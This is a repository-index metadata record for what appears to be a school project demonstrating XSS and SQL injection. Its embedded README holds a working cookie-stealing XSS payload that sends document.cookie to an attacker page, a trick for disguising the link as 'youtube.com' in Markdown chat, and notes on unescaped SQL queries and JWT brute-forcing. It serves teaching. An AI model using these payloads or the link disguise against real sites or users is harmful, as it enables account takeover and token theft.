{"id":18395665,"url":"https://github.com/lukeuke/xss_showcase","last_synced_at":"2025-04-12T13:53:30.861Z","repository":{"id":233326301,"uuid":"787009508","full_name":"Lukeuke/xss_showcase","owner":"Lukeuke","description":"xss with mysqli showcase in php","archived":false,"fork":false,"pushed_at":"2024-04-16T21:22:10.000Z","size":770,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-16T02:24:14.324Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Lukeuke.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-04-15T18:05:27.000Z","updated_at":"2024-04-15T18:05:40.000Z","dependencies_parsed_at":"2024-04-15T19:55:43.642Z","dependency_job_id":"9f25c51c-2c49-4c6f-bbcc-aa2f35deafe6","html_url":"https://github.com/Lukeuke/xss_showcase","commit_stats":null,"previous_names":["lukeuke/xss_showcase"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Lukeuke%2Fxss_showcase","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Lukeuke%2Fxss_showcase/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Lukeuke%2Fxss_showcase/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Lukeuke%2Fxss_showcase/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Lukeuke","download_url":"https://codeload.github.com/Luke
uke/xss_showcase/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248576530,"owners_count":21127427,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-06T02:11:38.994Z","updated_at":"2025-04-12T13:53:30.842Z","avatar_url":"https://github.com/Lukeuke.png","language":"PHP","funding_links":[],"categories":[],"sub_categories":[],"readme":"# XSS and MySQLi vulnerability website\n\u003e Made for a school project\n\n## Table of Contents\n1. [Installation](#installation)\n2. [Attacks](#attacks)\n3. [About](#about)\n4. [How does it work?](#how-does-it-work)\n\n## Installation\n\n### Requirements\n1. XAMPP\n2. Node.js \u003e= v18.x.x\n3. NPM \u003e= 8.19.2\n\n### Installation steps\n\n#### Victim's PC\n1. Install XAMPP\n2. Open XAMPP's ``htdocs`` folder\n3. Create a folder called ``XSS_Example`` and open it\n4. Clone this repo with ```git clone https://github.com/Lukeuke/xss_showcase.git``` or download the ZIP and extract it into this folder\n5. Create a database called ``xss_attack_db`` and import ``xss_attack_db.sql``\n6. Open the website in your browser. The URL will probably be ``localhost/XSS_Example`` if you did all the steps correctly\n7. Then select the ``victim`` folder\n\n#### Attacker's PC\n1. Make sure you have ``Node.js`` and ``NPM`` installed\n2. Go to the ``attacker`` folder in your cloned repo in htdocs\n3. Open Console/Terminal and type ```npm i``` or ```npm install```\n4. After this, a ``node_modules`` folder should be created\n5. 
Open Console/Terminal, type ``ipconfig`` and note your local network IP. It will most probably be under the Ethernet or Wireless adapter, and the IP will probably be something like ``192.168.x.x``\n6. In the ``attacker`` folder, open ``server.js`` in your code editor of choice and change this section to match your local network IP\n```js\napp.listen(3000, '192.168.1.100'); // server.js line 36: change this -\u003e '192.168.1.100'\n```\n7. Do the same with ``index.html``: open it and change the address on line 22 to your local IP.\n8. In ```fetch(\"http://x.x.x.x:3000/\"``` change only the part shown as ``x``\n9. Run the server. In Console/Terminal type ``node server.js``\n\n##### If you did all the steps correctly you should have both the attacker and victim pages running\n\n## Attacks\n\n### XSS\n\u003e Hint: the products search is vulnerable to XSS. Try typing this in the search input: \u003cscript\u003ealert('XSS')\u003c/script\u003e\n\n### MySQL Injection\n\u003e Try to find one. There are raw SQL queries that are not escaped.\n\n### JWT Signature bruteforce\n\u003e Install https://github.com/lmammino/jwt-cracker and try to brute-force the JWT signing key\n\n## About\nThis project shows how someone's JWT can be grabbed through an XSS attack. If the victim is logged in, you simply send them:\n  \n  http://localhost/XSS_example/victim/products.php?search=%3Cscript%3Ewindow.location.replace(`http://localhost/XSS_example/attacker/index.html?${document.cookie}`)%3C/script%3E\n\nor, if you are using a chat app that supports Markdown, you can embed this link so it's more hidden, like this:\n  \n  ```md\n[youtube.com](http://localhost/XSS_example/victim/products.php?search=%3Cscript%3Ewindow.location.replace(`http://localhost/XSS_example/attacker/index.html?${document.cookie}`)%3C/script%3E)\n  ```\n\nIn the chat, the victim will see the link as youtube.com, but in reality it grabs their token and sends it to you. 
Example of how it will look:\n\n[youtube.com](http://localhost/XSS_example/victim/products.php?search=%3Cscript%3Ewindow.location.replace(`http://localhost/XSS_example/attacker/index.html?${document.cookie}`)%3C/script%3E)\n\n## How does it work?\n  It injects a \u003cscript\u003e\u003c/script\u003e tag into your DOM\n  and then executes this JavaScript code:\n  \n  ```js\n  window.location.replace(`http://localhost/XSS_example/attacker/index.html?${document.cookie}`)\n  ```\n  \n  It replaces your URL with the attacker's website and grabs your cookies from the vulnerable website.\n  The JWT is stored in the cookies.\n  If the attacker has your JWT, they also have access to your whole account.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flukeuke%2Fxss_showcase","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Flukeuke%2Fxss_showcase","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flukeuke%2Fxss_showcase/lists"}